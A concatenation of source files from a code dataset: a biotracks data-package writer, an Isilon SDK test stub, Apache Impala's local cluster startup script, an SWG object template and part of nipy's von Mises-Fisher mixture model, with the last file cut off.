biotracks/createdp.py
|
sbesson/biotracks
|
1adc6f954e2a29fcc250c45e7b463752d06dd5ab
|
[
"BSD-2-Clause"
] | 10 |
2017-05-24T07:41:04.000Z
|
2019-10-28T14:32:01.000Z
|
biotracks/createdp.py
|
pcmasuzzo/dpkg
|
5c7d067232f10c786c85b96b18cc56dd7d6d019f
|
[
"BSD-2-Clause"
] | 40 |
2017-05-02T16:30:42.000Z
|
2020-04-30T13:19:35.000Z
|
biotracks/createdp.py
|
pcmasuzzo/dpkg
|
5c7d067232f10c786c85b96b18cc56dd7d6d019f
|
[
"BSD-2-Clause"
] | 6 |
2017-06-19T13:55:28.000Z
|
2018-09-18T09:03:45.000Z
|
# #%L
# Copyright (c) 2016-2017 Cell Migration Standardisation Organization
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# #L%
import json
import csv
import os
import re
import datapackage
from jsontableschema import infer
from . import cmso, config
from .utils import get_logger, mkdir_p
# https://specs.frictionlessdata.io/data-package/#metadata
NAME_PATTERN = re.compile(r"^[a-z0-9_.-]+$")
FOREIGN_KEYS = [{
"fields": cmso.OBJECT_ID,
"reference": {
"datapackage": "",
"resource": cmso.OBJECTS_TABLE,
"fields": cmso.OBJECT_ID
}
}]
def infer_from_df(df, **kwargs):
# df.iterrows does not preserve types
h = df.head()
fields = list(df)
iterrows = ([str(h[_].values[i]) for _ in fields]
for i in range(h.shape[0]))
return infer(fields, iterrows, **kwargs)
def to_json(dp):
return json.dumps(dp.to_dict(), indent=4, sort_keys=True)
def create(reader, out_dir, log_level=None):
logger = get_logger("createdp.create", level=log_level)
top_level_dict = reader.conf[config.TOP_LEVEL]
try:
name = top_level_dict["name"]
except KeyError:
raise ValueError("'name' is a required property")
if not NAME_PATTERN.match(name):
raise ValueError("invalid name: %r" % (name,))
dp = datapackage.DataPackage()
for k, v in top_level_dict.items():
dp.descriptor[k] = v
dp.descriptor['resources'] = []
mkdir_p(out_dir)
logger.info("writing to '%s'", out_dir)
for a in "objects", "links":
out_bn = "%s.csv" % a
out_fn = os.path.join(out_dir, out_bn)
df = getattr(reader, a)
df.to_csv(out_fn, index=False, quoting=csv.QUOTE_NONE)
if a == "objects":
name = cmso.OBJECTS_TABLE
infer_kwargs = {"primary_key": cmso.OBJECT_ID}
else:
name = cmso.LINKS_TABLE
infer_kwargs = {}
schema = infer_from_df(df, **infer_kwargs)
if a == "links":
schema['foreignKeys'] = FOREIGN_KEYS
res = {"name": name, "path": out_bn, "schema": schema}
dp.descriptor['resources'].append(res)
with open(os.path.join(out_dir, 'dp.json'), 'w') as f:
f.write(to_json(dp) + '\n')
return dp
| 35.876289 | 78 | 0.682471 |
c834796649da4ccb7176af438c1217c012994d6f
| 902 |
py
|
Python
|
isi_sdk_8_0_1/test/test_antivirus_server.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24 |
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_0_1/test/test_antivirus_server.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46 |
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_0_1/test/test_antivirus_server.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29 |
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.antivirus_server import AntivirusServer # noqa: E501
from isi_sdk_8_0_1.rest import ApiException
class TestAntivirusServer(unittest.TestCase):
"""AntivirusServer unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testAntivirusServer(self):
"""Test AntivirusServer"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_0_1.models.antivirus_server.AntivirusServer() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 22 | 87 | 0.7051 |
2b42959576884c0c390ecf9837aeae4f42e29e4f
| 18,759 |
py
|
Python
|
bin/start-impala-cluster.py
|
im0nk3y/Impala
|
f40f81639d0121925b71a1cbb85e1c9c51230058
|
[
"Apache-2.0"
] | null | null | null |
bin/start-impala-cluster.py
|
im0nk3y/Impala
|
f40f81639d0121925b71a1cbb85e1c9c51230058
|
[
"Apache-2.0"
] | null | null | null |
bin/start-impala-cluster.py
|
im0nk3y/Impala
|
f40f81639d0121925b71a1cbb85e1c9c51230058
|
[
"Apache-2.0"
] | 1 |
2018-08-22T15:33:23.000Z
|
2018-08-22T15:33:23.000Z
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Starts up an Impala cluster (ImpalaD + State Store) with the specified number of
# ImpalaD instances. Each ImpalaD runs on a different port allowing this to be run
# on a single machine.
import os
import psutil
import sys
from getpass import getuser
from time import sleep, time
from optparse import OptionParser
from testdata.common import cgroups
KUDU_MASTER_HOSTS = os.getenv('KUDU_MASTER_HOSTS', '127.0.0.1')
DEFAULT_IMPALA_MAX_LOG_FILES = os.environ.get('IMPALA_MAX_LOG_FILES', 10)
# Options
parser = OptionParser()
parser.add_option("-s", "--cluster_size", type="int", dest="cluster_size", default=3,
help="Size of the cluster (number of impalad instances to start).")
parser.add_option("-c", "--num_coordinators", type="int", dest="num_coordinators",
default=3, help="Number of coordinators.")
parser.add_option("--use_exclusive_coordinators", dest="use_exclusive_coordinators",
action="store_true", default=False, help="If true, coordinators only "
"coordinate queries and execute coordinator fragments. If false, "
"coordinators also act as executors.")
parser.add_option("--build_type", dest="build_type", default= 'latest',
help="Build type to use - debug / release / latest")
parser.add_option("--impalad_args", dest="impalad_args", action="append", type="string",
default=[],
help="Additional arguments to pass to each Impalad during startup")
parser.add_option("--state_store_args", dest="state_store_args", action="append",
type="string", default=[],
help="Additional arguments to pass to State Store during startup")
parser.add_option("--catalogd_args", dest="catalogd_args", action="append",
type="string", default=[],
help="Additional arguments to pass to the Catalog Service at startup")
parser.add_option("--kill", "--kill_only", dest="kill_only", action="store_true",
default=False, help="Instead of starting the cluster, just kill all"
" the running impalads and the statestored.")
parser.add_option("--force_kill", dest="force_kill", action="store_true", default=False,
help="Force kill impalad and statestore processes.")
parser.add_option("-r", "--restart_impalad_only", dest="restart_impalad_only",
action="store_true", default=False,
help="Restarts only the impalad processes")
parser.add_option("--in-process", dest="inprocess", action="store_true", default=False,
help="Start all Impala backends and state store in a single process.")
parser.add_option("--log_dir", dest="log_dir",
default=os.environ['IMPALA_CLUSTER_LOGS_DIR'],
help="Directory to store output logs to.")
parser.add_option('--max_log_files', default=DEFAULT_IMPALA_MAX_LOG_FILES,
help='Max number of log files before rotation occurs.')
parser.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
help="Prints all output to stderr/stdout.")
parser.add_option("--wait_for_cluster", dest="wait_for_cluster", action="store_true",
default=False, help="Wait until the cluster is ready to accept "
"queries before returning.")
parser.add_option("--log_level", type="int", dest="log_level", default=1,
help="Set the impalad backend logging level")
parser.add_option("--jvm_args", dest="jvm_args", default="",
help="Additional arguments to pass to the JVM(s) during startup.")
parser.add_option("--kudu_master_hosts", default=KUDU_MASTER_HOSTS,
help="The host name or address of the Kudu master. Multiple masters "
"can be specified using a comma separated list.")
options, args = parser.parse_args()
IMPALA_HOME = os.environ['IMPALA_HOME']
KNOWN_BUILD_TYPES = ['debug', 'release', 'latest']
IMPALAD_PATH = os.path.join(IMPALA_HOME,
'bin/start-impalad.sh -build_type=%s' % options.build_type)
STATE_STORE_PATH = os.path.join(IMPALA_HOME,
'bin/start-statestored.sh -build_type=%s' % options.build_type)
CATALOGD_PATH = os.path.join(IMPALA_HOME,
'bin/start-catalogd.sh -build_type=%s' % options.build_type)
MINI_IMPALA_CLUSTER_PATH = IMPALAD_PATH + " -in-process"
IMPALA_SHELL = os.path.join(IMPALA_HOME, 'bin/impala-shell.sh')
IMPALAD_PORTS = ("-beeswax_port=%d -hs2_port=%d -be_port=%d "
"-state_store_subscriber_port=%d -webserver_port=%d")
JVM_ARGS = "-jvm_debug_port=%s -jvm_args=%s"
BE_LOGGING_ARGS = "-log_filename=%s -log_dir=%s -v=%s -logbufsecs=5 -max_log_files=%s"
CLUSTER_WAIT_TIMEOUT_IN_SECONDS = 240
# Kills have a timeout to prevent automated scripts from hanging indefinitely.
# It is set to a high value to avoid failing if processes are slow to shut down.
KILL_TIMEOUT_IN_SECONDS = 240
def find_user_processes(binaries):
"""Returns an iterator over all processes owned by the current user with a matching
binary name from the provided list."""
for pid in psutil.get_pid_list():
try:
process = psutil.Process(pid)
if process.username == getuser() and process.name in binaries: yield process
except KeyError, e:
if "uid not found" not in str(e):
raise
except psutil.NoSuchProcess, e:
# Ignore the case when a process no longer exists.
pass
def check_process_exists(binary, attempts=1):
"""Checks if a process exists given the binary name. The `attempts` count allows us to
control the time a process needs to settle until it becomes available. After each try
the script will sleep for one second and retry. Returns True if it exists and False
otherwise.
"""
for _ in range(attempts):
for proc in find_user_processes([binary]):
return True
sleep(1)
return False
def exec_impala_process(cmd, args, stderr_log_file_path):
redirect_output = str()
if options.verbose:
args += ' -logtostderr=1'
else:
redirect_output = "1>%s" % stderr_log_file_path
cmd = '%s %s %s 2>&1 &' % (cmd, args, redirect_output)
os.system(cmd)
def kill_cluster_processes(force=False):
binaries = ['catalogd', 'impalad', 'statestored', 'mini-impala-cluster']
kill_matching_processes(binaries, force)
def kill_matching_processes(binary_names, force=False):
"""Kills all processes with the given binary name, waiting for them to exit"""
# Send all the signals before waiting so that processes can clean up in parallel.
processes = list(find_user_processes(binary_names))
for process in processes:
try:
if force:
process.kill()
else:
process.terminate()
except psutil.NoSuchProcess:
pass
for process in processes:
try:
process.wait(KILL_TIMEOUT_IN_SECONDS)
except psutil.TimeoutExpired:
raise RuntimeError("Unable to kill %s (pid %d) after %d seconds." % (process.name,
process.pid, KILL_TIMEOUT_IN_SECONDS))
def start_statestore():
print "Starting State Store logging to %s/statestored.INFO" % options.log_dir
stderr_log_file_path = os.path.join(options.log_dir, "statestore-error.log")
args = "%s %s" % (build_impalad_logging_args(0, "statestored"),
" ".join(options.state_store_args))
exec_impala_process(STATE_STORE_PATH, args, stderr_log_file_path)
if not check_process_exists("statestored", 10):
raise RuntimeError("Unable to start statestored. Check log or file permissions"
" for more details.")
def start_catalogd():
print "Starting Catalog Service logging to %s/catalogd.INFO" % options.log_dir
stderr_log_file_path = os.path.join(options.log_dir, "catalogd-error.log")
args = "%s %s %s" % (build_impalad_logging_args(0, "catalogd"),
" ".join(options.catalogd_args),
build_jvm_args(options.cluster_size))
exec_impala_process(CATALOGD_PATH, args, stderr_log_file_path)
if not check_process_exists("catalogd", 10):
raise RuntimeError("Unable to start catalogd. Check log or file permissions"
" for more details.")
def start_mini_impala_cluster(cluster_size):
print ("Starting in-process Impala Cluster logging "
"to %s/mini-impala-cluster.INFO" % options.log_dir)
args = "-num_backends=%s %s" %\
(cluster_size, build_impalad_logging_args(0, 'mini-impala-cluster'))
stderr_log_file_path = os.path.join(options.log_dir, 'mini-impala-cluster-error.log')
exec_impala_process(MINI_IMPALA_CLUSTER_PATH, args, stderr_log_file_path)
def build_impalad_port_args(instance_num):
BASE_BEESWAX_PORT = 21000
BASE_HS2_PORT = 21050
BASE_BE_PORT = 22000
BASE_STATE_STORE_SUBSCRIBER_PORT = 23000
BASE_WEBSERVER_PORT = 25000
return IMPALAD_PORTS % (BASE_BEESWAX_PORT + instance_num, BASE_HS2_PORT + instance_num,
BASE_BE_PORT + instance_num,
BASE_STATE_STORE_SUBSCRIBER_PORT + instance_num,
BASE_WEBSERVER_PORT + instance_num)
def build_impalad_logging_args(instance_num, service_name):
return BE_LOGGING_ARGS % (service_name, options.log_dir, options.log_level,
options.max_log_files)
def build_jvm_args(instance_num):
BASE_JVM_DEBUG_PORT = 30000
return JVM_ARGS % (BASE_JVM_DEBUG_PORT + instance_num, options.jvm_args)
def start_impalad_instances(cluster_size, num_coordinators, use_exclusive_coordinators):
"""Start 'cluster_size' impalad instances. The first 'num_coordinator' instances will
act as coordinators. 'use_exclusive_coordinators' specifies whether the coordinators
will only execute coordinator fragments."""
if cluster_size == 0:
# No impalad instances should be started.
return
# The default memory limit for an impalad is 80% of the total system memory. On a
# mini-cluster with 3 impalads that means 240%. Since having an impalad be OOM killed
# is very annoying, the mem limit will be reduced. This can be overridden using the
# --impalad_args flag. virtual_memory().total returns the total physical memory.
mem_limit = int(0.8 * psutil.virtual_memory().total / cluster_size)
# Start each impalad instance and optionally redirect the output to a log file.
for i in range(cluster_size):
if i == 0:
# The first impalad always logs to impalad.INFO
service_name = "impalad"
else:
service_name = "impalad_node%s" % i
# Sleep between instance startup: simultaneous starts hurt the minikdc
# Yes, this is a hack, but it's easier than modifying the minikdc...
# TODO: is this really necessary?
sleep(1)
print "Starting Impala Daemon logging to %s/%s.INFO" % (options.log_dir,
service_name)
# impalad args from the --impalad_args flag. Also replacing '#ID' with the instance.
param_args = (" ".join(options.impalad_args)).replace("#ID", str(i))
args = "--mem_limit=%s %s %s %s %s" %\
(mem_limit, # Goes first so --impalad_args will override it.
build_impalad_logging_args(i, service_name), build_jvm_args(i),
build_impalad_port_args(i), param_args)
if options.kudu_master_hosts:
# Must be prepended, otherwise the java options interfere.
args = "-kudu_master_hosts %s %s" % (options.kudu_master_hosts, args)
if i >= num_coordinators:
args = "-is_coordinator=false %s" % (args)
elif use_exclusive_coordinators:
# Coordinator instance that doesn't execute non-coordinator fragments
args = "-is_executor=false %s" % (args)
stderr_log_file_path = os.path.join(options.log_dir, '%s-error.log' % service_name)
exec_impala_process(IMPALAD_PATH, args, stderr_log_file_path)
def wait_for_impala_process_count(impala_cluster, retries=10):
"""Checks that the desired number of impalad/statestored processes are running.
Refresh until the number running impalad/statestored processes reaches the expected
number based on CLUSTER_SIZE, or the retry limit is hit. Failing this, raise a
RuntimeError.
"""
for i in range(retries):
if len(impala_cluster.impalads) < options.cluster_size or \
not impala_cluster.statestored or not impala_cluster.catalogd:
sleep(1)
impala_cluster.refresh()
msg = str()
if len(impala_cluster.impalads) < options.cluster_size:
impalads_found = len(impala_cluster.impalads)
msg += "Expected %d impalad(s), only %d found\n" %\
(options.cluster_size, impalads_found)
if not impala_cluster.statestored:
msg += "statestored failed to start.\n"
if not impala_cluster.catalogd:
msg += "catalogd failed to start.\n"
if msg:
raise RuntimeError(msg)
def wait_for_cluster_web(timeout_in_seconds=CLUSTER_WAIT_TIMEOUT_IN_SECONDS):
"""Checks if the cluster is "ready"
A cluster is deemed "ready" if:
- All backends are registered with the statestore.
- Each impalad knows about all other impalads.
This information is retrieved by querying the statestore debug webpage
and each individual impalad's metrics webpage.
"""
impala_cluster = ImpalaCluster()
# impalad processes may take a while to come up.
wait_for_impala_process_count(impala_cluster)
for impalad in impala_cluster.impalads:
impalad.service.wait_for_num_known_live_backends(options.cluster_size,
timeout=CLUSTER_WAIT_TIMEOUT_IN_SECONDS, interval=2)
if impalad._get_arg_value('is_coordinator', default='true') == 'true':
wait_for_catalog(impalad, timeout_in_seconds=CLUSTER_WAIT_TIMEOUT_IN_SECONDS)
def wait_for_catalog(impalad, timeout_in_seconds):
"""Waits for the impalad catalog to become ready"""
start_time = time()
catalog_ready = False
attempt = 0
while (time() - start_time < timeout_in_seconds and not catalog_ready):
try:
num_dbs = impalad.service.get_metric_value('catalog.num-databases')
num_tbls = impalad.service.get_metric_value('catalog.num-tables')
catalog_ready = impalad.service.get_metric_value('catalog.ready')
if catalog_ready or attempt % 4 == 0:
print 'Waiting for Catalog... Status: %s DBs / %s tables (ready=%s)' %\
(num_dbs, num_tbls, catalog_ready)
attempt += 1
except Exception, e:
print e
sleep(0.5)
if not catalog_ready:
raise RuntimeError('Catalog was not initialized in expected time period.')
def wait_for_cluster_cmdline(timeout_in_seconds=CLUSTER_WAIT_TIMEOUT_IN_SECONDS):
"""Checks if the cluster is "ready" by executing a simple query in a loop"""
start_time = time()
while os.system('%s -i localhost:21000 -q "%s"' % (IMPALA_SHELL, 'select 1')) != 0:
if time() - timeout_in_seconds > start_time:
raise RuntimeError('Cluster did not start within %d seconds' % timeout_in_seconds)
print 'Cluster not yet available. Sleeping...'
sleep(2)
if __name__ == "__main__":
if options.kill_only:
kill_cluster_processes(force=options.force_kill)
sys.exit(0)
if options.build_type not in KNOWN_BUILD_TYPES:
print 'Invalid build type %s' % options.build_type
print 'Valid values: %s' % ', '.join(KNOWN_BUILD_TYPES)
sys.exit(1)
if options.cluster_size < 0:
print 'Please specify a cluster size >= 0'
sys.exit(1)
if options.num_coordinators <= 0:
print 'Please specify a valid number of coordinators > 0'
sys.exit(1)
if options.use_exclusive_coordinators and options.num_coordinators >= options.cluster_size:
print 'Cannot start an Impala cluster with no executors'
sys.exit(1)
if not os.path.isdir(options.log_dir):
print 'Log dir does not exist or is not a directory: %s' % options.log_dir
sys.exit(1)
# Kill existing cluster processes based on the current configuration.
if options.restart_impalad_only:
if options.inprocess:
print 'Cannot perform individual component restarts using an in-process cluster'
sys.exit(1)
kill_matching_processes(['impalad'], force=options.force_kill)
else:
kill_cluster_processes(force=options.force_kill)
try:
import json
wait_for_cluster = wait_for_cluster_web
except ImportError:
print "json module not found, checking for cluster startup through the command-line"
wait_for_cluster = wait_for_cluster_cmdline
# If ImpalaCluster cannot be imported, fall back to the command-line to check
# whether impalads/statestore are up.
try:
from tests.common.impala_cluster import ImpalaCluster
if options.restart_impalad_only:
impala_cluster = ImpalaCluster()
if not impala_cluster.statestored or not impala_cluster.catalogd:
print 'No running statestored or catalogd detected. Restarting entire cluster.'
options.restart_impalad_only = False
except ImportError:
print 'ImpalaCluster module not found.'
# TODO: Update this code path to work similar to the ImpalaCluster code path when
# restarting only impalad processes. Specifically, we should do a full cluster
# restart if either the statestored or catalogd processes are down, even if
# restart_only_impalad=True.
wait_for_cluster = wait_for_cluster_cmdline
if options.inprocess:
# The statestore and the impalads start in the same process.
start_mini_impala_cluster(options.cluster_size)
wait_for_cluster_cmdline()
else:
try:
if not options.restart_impalad_only:
start_statestore()
start_catalogd()
start_impalad_instances(options.cluster_size, options.num_coordinators,
options.use_exclusive_coordinators)
# Sleep briefly to reduce log spam: the cluster takes some time to start up.
sleep(3)
wait_for_cluster()
except Exception, e:
print 'Error starting cluster: %s' % e
sys.exit(1)
print 'Impala Cluster Running with %d nodes and %d coordinators.' % (
options.cluster_size, options.num_coordinators)
| 45.642336 | 93 | 0.712298 |
dccf2e0af1754ed81394a72acb053a98eb4ead3b
| 437 |
py
|
Python
|
data/scripts/templates/object/tangible/lair/murra/shared_lair_murra.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20 |
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/tangible/lair/murra/shared_lair_murra.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/tangible/lair/murra/shared_lair_murra.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20 |
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/lair/murra/shared_lair_murra.iff"
result.attribute_template_id = -1
result.stfName("lair_n","murra")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 25.705882 | 69 | 0.718535 |
c5cc5495d894deffd11e576f414b0c3d09eac59b
| 64 |
py
|
Python
|
epytodo_2017/lib/python3.6/copy.py
|
ltabis/epitech-projects
|
e38b3f00a4ac44c969d5e4880cd65084dc2c870a
|
[
"MIT"
] | null | null | null |
epytodo_2017/lib/python3.6/copy.py
|
ltabis/epitech-projects
|
e38b3f00a4ac44c969d5e4880cd65084dc2c870a
|
[
"MIT"
] | null | null | null |
epytodo_2017/lib/python3.6/copy.py
|
ltabis/epitech-projects
|
e38b3f00a4ac44c969d5e4880cd65084dc2c870a
|
[
"MIT"
] | 1 |
2021-01-07T17:41:14.000Z
|
2021-01-07T17:41:14.000Z
|
IntxLNK/ u s r / l i b 6 4 / p y t h o n 3 . 6 / c o p y . p y
| 64 | 64 | 0.453125 |
f59218e14f693924b645493166ea31bff2cd6bca
| 13,299 |
py
|
Python
|
nipy/algorithms/clustering/von_mises_fisher_mixture.py
|
neurospin/nipy
|
cc54600a0dca1e003ad393bc05c46f91eef30a68
|
[
"BSD-3-Clause"
] | 1 |
2016-03-08T15:01:06.000Z
|
2016-03-08T15:01:06.000Z
|
nipy/algorithms/clustering/von_mises_fisher_mixture.py
|
neurospin/nipy
|
cc54600a0dca1e003ad393bc05c46f91eef30a68
|
[
"BSD-3-Clause"
] | null | null | null |
nipy/algorithms/clustering/von_mises_fisher_mixture.py
|
neurospin/nipy
|
cc54600a0dca1e003ad393bc05c46f91eef30a68
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Implementation of Von-Mises-Fisher Mixture models,
i.e. the equaivalent of mixture of Gaussian on the sphere.
Author: Bertrand Thirion, 2010-2011
"""
import numpy as np
class VonMisesMixture(object):
"""
Model for Von Mises mixture distribution with fixed variance
on a two-dimensional sphere
"""
def __init__(self, k, precision, means=None, weights=None,
null_class=False):
""" Initialize Von Mises mixture
Parameters
----------
k: int,
number of components
precision: float,
the fixed precision parameter
means: array of shape(self.k, 3), optional
input component centers
weights: array of shape(self.k), optional
input components weights
null_class: bool, optional
Inclusion of a null class within the model
(related to k=0)
fixme
-----
consistency checks
"""
self.k = k
self.dim = 2
self.em_dim = 3
self.means = means
self.precision = precision
self.weights = weights
self.null_class = null_class
def log_density_per_component(self, x):
"""Compute the per-component density of the data
Parameters
----------
x: array fo shape(n,3)
should be on the unit sphere
Returns
-------
like: array of shape(n, self.k), with non-neagtive values
the density
"""
n = x.shape[0]
constant = self.precision / (2 * np.pi * (1 - np.exp( - \
2 * self.precision)))
loglike = np.log(constant) + \
(np.dot(x, self.means.T) - 1) * self.precision
if self.null_class:
loglike = np.hstack((np.log(1. / (4 * np.pi)) * np.ones((n, 1)),
loglike))
return loglike
def density_per_component(self, x):
"""
Compute the per-component density of the data
Parameters
----------
x: array fo shape(n,3)
should be on the unit sphere
Returns
-------
like: array of shape(n, self.k), with non-neagtive values
the density
"""
return np.exp(self.log_density_per_component(x))
def weighted_density(self, x):
""" Return weighted density
Parameters
----------
x: array shape(n,3)
should be on the unit sphere
Returns
-------
like: array
of shape(n, self.k)
"""
return(self.density_per_component(x) * self.weights)
def log_weighted_density(self, x):
""" Return log weighted density
Parameters
----------
x: array fo shape(n,3)
should be on the unit sphere
Returns
-------
log_like: array of shape(n, self.k)
"""
return(self.log_density_per_component(x) + np.log(self.weights))
def mixture_density(self, x):
""" Return mixture density
Parameters
----------
x: array fo shape(n,3)
should be on the unit sphere
Returns
-------
like: array of shape(n)
"""
wl = self.weighted_density(x)
return np.sum(wl, 1)
def responsibilities(self, x):
""" Return responsibilities
Parameters
----------
x: array fo shape(n,3)
should be on the unit sphere
Returns
-------
resp: array of shape(n, self.k)
"""
lwl = self.log_weighted_density(x)
wl = np.exp(lwl.T - lwl.mean(1)).T
swl = np.sum(wl, 1)
resp = (wl.T / swl).T
return resp
def estimate_weights(self, z):
""" Calculate and set weights from `z`
Parameters
----------
z: array of shape(self.k)
"""
self.weights = np.sum(z, 0) / z.sum()
def estimate_means(self, x, z):
""" Calculate and set means from `x` and `z`
Parameters
----------
x: array fo shape(n,3)
should be on the unit sphere
z: array of shape(self.k)
"""
m = np.dot(z.T, x)
self.means = (m.T / np.sqrt(np.sum(m ** 2, 1))).T
def estimate(self, x, maxiter=100, miniter=1, bias=None):
""" Return average log density across samples
Parameters
----------
x: array fo shape(n,3)
should be on the unit sphere
maxiter: int, optional,
maximum number of iterations of the algorithms
miniter=1: int, optional,
minimum number of iterations
bias: array of shape(n), optional
prior probability of being in a non-null class
Return
------
ll: float, average (across samples) log-density
"""
# initialization with random positions and constant weights
if self.weights is None:
self.weights = np.ones(self.k) / self.k
if self.null_class:
self.weights = np.ones(self.k + 1) / (self.k + 1)
if self.means is None:
aux = np.arange(x.shape[0])
np.random.shuffle(aux)
self.means = x[aux[:self.k]]
# EM algorithm
assert not(np.isnan(self.means).any())
pll = - np.infty
for i in range(maxiter):
ll = np.log(self.mixture_density(x)).mean()
z = self.responsibilities(x)
assert not(np.isnan(z).any())
# bias z
if bias is not None:
z[:, 0] *= (1 - bias)
z[:, 1:] = ((z[:, 1:].T) * bias).T
z = (z.T / np.sum(z, 1)).T
self.estimate_weights(z)
if self.null_class:
self.estimate_means(x, z[:, 1:])
else:
self.estimate_means(x, z)
assert not(np.isnan(self.means).any())
if (i > miniter) and (ll < pll + 1.e-6):
break
pll = ll
return ll
def show(self, x):
""" Visualization utility
Parameters
----------
x: array fo shape(n,3)
should be on the unit sphere
"""
# label the data
z = np.argmax(self.responsibilities(x), 1)
import pylab
import mpl_toolkits.mplot3d.axes3d as p3
fig = pylab.figure()
ax = p3.Axes3D(fig)
colors = (['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] * \
(1 + (1 + self.k) / 8))[:self.k + 1]
if (self.null_class) and (z == 0).any():
ax.plot3D(x[z == 0, 0], x[z == 0, 1], x[z == 0, 2], '.',
color=colors[0])
for k in range(self.k):
if self.null_class:
if np.sum(z == (k + 1)) == 0:
continue
uk = z == (k + 1)
ax.plot3D(x[uk, 0], x[uk, 1], x[uk, 2], '.',
color=colors[k + 1])
ax.plot3D([self.means[k, 0]], [self.means[k, 1]],
[self.means[k, 2]], 'o', color=colors[k + 1])
else:
if np.sum(z == k) == 0:
continue
ax.plot3D(x[z == k, 0], x[z == k, 1], x[z == k, 2], '.',
color=colors[k])
ax.plot3D([self.means[k, 0]], [self.means[k, 1]],
[self.means[k, 2]], 'o', color=colors[k])
pylab.show()
def estimate_robust_vmm(k, precision, null_class, x, ninit=10, bias=None,
maxiter=100):
""" Return the best von_mises mixture after severla initialization
Parameters
----------
k: int, number of classes
precision: float, priori precision parameter
null class: bool, optional,
should a null class be included or not
x: array fo shape(n,3)
input data, should be on the unit sphere
ninit: int, optional,
number of iterations
bias: array of shape(n), optional
prior probability of being in a non-null class
maxiter: int, optional,
maximum number of iterations after each initialization
"""
score = - np.infty
for i in range(ninit):
aux = VonMisesMixture(k, precision, null_class=null_class)
ll = aux.estimate(x, bias=bias)
if ll > score:
best_model = aux
score = ll
return best_model
def select_vmm(krange, precision, null_class, x, ninit=10, bias=None,
maxiter=100, verbose=0):
"""Return the best von_mises mixture after severla initialization
Parameters
----------
krange: list of ints,
number of classes to consider
precision:
null class:
x: array fo shape(n,3)
should be on the unit sphere
ninit: int, optional,
number of iterations
maxiter: int, optional,
bias: array of shape(n),
a prior probability of not being in the null class
verbose: Bool, optional
"""
score = - np.infty
for k in krange:
aux = estimate_robust_vmm(k, precision, null_class, x, ninit, bias,
maxiter)
ll = aux.estimate(x)
if null_class:
bic = ll - np.log(x.shape[0]) * k * 3 / x.shape[0]
else:
bic = ll - np.log(x.shape[0]) * (k * 3 - 1) / x.shape[0]
if verbose:
print k, bic
if bic > score:
best_model = aux
score = bic
return best_model
def select_vmm_cv(krange, precision, x, null_class, cv_index,
ninit=5, maxiter=100, bias=None, verbose=0):
"""Return the best von_mises mixture after severla initialization
Parameters
----------
krange: list of ints,
